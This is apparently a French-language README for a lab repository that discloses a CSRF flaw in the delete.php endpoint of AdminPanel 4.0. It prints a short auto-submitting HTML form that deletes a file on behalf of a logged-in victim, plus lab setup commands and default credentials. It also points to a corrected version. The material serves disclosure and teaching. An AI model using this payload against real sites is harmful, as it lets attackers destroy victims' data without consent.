
Démonstration pédagogique de la vulnérabilité CSRF dans un environnement de laboratoire contrôlé, incluant un exploit de preuve de concept et une version corrigée avec des protections CSRF appropriées.
ID CVE : CVE-2026-30498 (Réservé par MITRE)
Découvreur : Mehdi Ben Hamou
Une vulnérabilité de falsification de requête intersite (CSRF) existe dans le point de terminaison delete.php d'AdminPanel 4.0.
Cette vulnérabilité permet à un attaquant de déclencher des actions sensibles (suppression de fichiers) au nom d'un utilisateur authentifié sans son consentement.
La vulnérabilité est causée par l'absence de protections CSRF :
Le point de terminaison vulnérable traite les requêtes directement en fonction de la session de l'utilisateur sans valider la source de la requête.
Une exploitation réussie conduit à :
verifyPanel.phpUn attaquant héberge une page web malveillante qui envoie une requête falsifiée :
http://localhost:8080/delete.php?file=verifyPanel.php
Lorsqu'une victime (utilisateur authentifié) visite cette page, le navigateur inclut automatiquement les cookies de session, et la requête est exécutée.
<form id="csrfForm" action="http://localhost:8080/delete.php" method="GET">
<input type="hidden" name="file" value="verifyPanel.php">
</form>
<script>
document.getElementById("csrfForm").submit();
</script>
Cette requête est automatiquement envoyée avec le cookie de session de la victime.
php -S localhost:8080
http://localhost:8080
admin / admin123
http://localhost:8081/evil.html
/panel/dashboard.php
Ce dépôt comprend un environnement de laboratoire contrôlé pour reproduire la vulnérabilité en toute sécurité.
Important : Ce laboratoire est une simulation et ne représente pas exactement le code source original d'AdminPanel.
Pour réinitialiser l'environnement :
/reset.php
Une version sécurisée est implémentée dans :
delete_fixed.php
Protections ajoutées :
victim/
├── index.php
├── delete.php
├── delete_fixed.php
├── reset.php
└── panel/
└── dashboard.php
attacker/
└── evil.html
Ce projet est destiné uniquement à des fins éducatives et de recherche.
N'utilisez pas cette vulnérabilité sur des systèmes sans autorisation appropriée.